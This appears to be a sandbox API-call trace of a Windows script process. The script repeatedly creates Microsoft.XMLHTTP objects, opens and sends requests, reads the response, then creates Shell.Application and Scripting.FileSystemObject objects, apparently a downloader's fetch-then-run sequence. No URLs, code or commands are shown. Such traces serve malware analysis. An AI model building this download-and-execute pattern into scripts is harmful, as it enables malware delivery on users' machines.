	[0790.593] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c08, pUnkSite=0x62f330) 
	[0790.593] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0790.593] XMLHTTPRequest:IUnknown:Release (This=0x49c5c08) returned 0x0
	[0790.593] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5ba0) returned 0x0
	[0790.593] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5ba0) returned 0x3
	[0790.594] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0790.594] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5ba0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0790.594] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0790.594] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0790.594] SysStringLen (param_1=0x0) returned 0x0
	[0790.594] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0790.594] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0790.594] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0790.594] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0790.594] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0790.594] ??2@YAPEAX_K@Z () returned 0x62f310
	[0790.594] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f310) 
	[0790.594] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0790.594] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0790.594] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0790.594] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0790.595] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0790.595] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0790.595] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0790.595] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0790.595] SysStringLen (param_1=0x0) returned 0x0
	[0790.595] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0790.595] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0790.595] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0790.595] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0790.595] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c08) returned 0x0
	[0790.595] ??2@YAPEAX_K@Z () returned 0x62f330
	[0790.595] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c08, pUnkSite=0x62f330) 
	[0790.595] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0790.595] XMLHTTPRequest:IUnknown:Release (This=0x49c5c08) returned 0x0
	[0790.595] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0790.595] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0790.596] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0790.596] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0790.596] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0790.596] longjmp () 
	[0790.596] longjmp () 
	[0790.596] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0790.596] SysStringLen (param_1=0x0) returned 0x0
	[0790.596] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0790.596] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0790.596] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0790.596] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0790.596] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bb8) returned 0x0
	[0790.596] ??2@YAPEAX_K@Z () returned 0x62f310
	[0790.596] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bb8, pUnkSite=0x62f310) 
	[0790.596] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0790.597] XMLHTTPRequest:IUnknown:Release (This=0x49c5bb8) returned 0x0
	[0790.597] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0790.597] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0790.597] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0790.597] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0790.597] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0790.597] longjmp () 
	[0790.597] longjmp () 
	[0790.597] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0790.597] SysStringLen (param_1=0x0) returned 0x0
	[0790.597] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0790.598] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0790.598] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0790.598] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0790.598] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c08) returned 0x0
	[0790.598] ??2@YAPEAX_K@Z () returned 0x62f330
	[0790.598] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c08, pUnkSite=0x62f330) 
	[0790.598] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0790.598] XMLHTTPRequest:IUnknown:Release (This=0x49c5c08) returned 0x0
	[0790.598] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0790.598] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0790.598] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0790.598] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0790.599] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0790.599] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0790.599] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0790.599] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0792.354] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0792.354] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0792.354] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0792.355] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0792.355] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0792.355] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0792.355] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0792.355] SysStringLen (param_1=0x0) returned 0x0
	[0792.355] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0792.355] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0792.355] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x3967c0) returned 0x0
	[0792.355] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0792.355] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396800) returned 0x0
	[0792.356] ??2@YAPEAX_K@Z () returned 0x62f350
	[0792.356] Shell:IObjectWithSite:SetSite (This=0x396800, pUnkSite=0x62f350) returned 0x0
	[0792.356] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0792.356] Shell:IUnknown:Release (This=0x396800) returned 0x1
	[0792.356] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x3967c0) returned 0x0
	[0792.356] Shell:IUnknown:AddRef (This=0x3967c0) returned 0x3
	[0792.356] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0792.356] SysStringLen (param_1=0x0) returned 0x0
	[0792.356] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0792.360] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
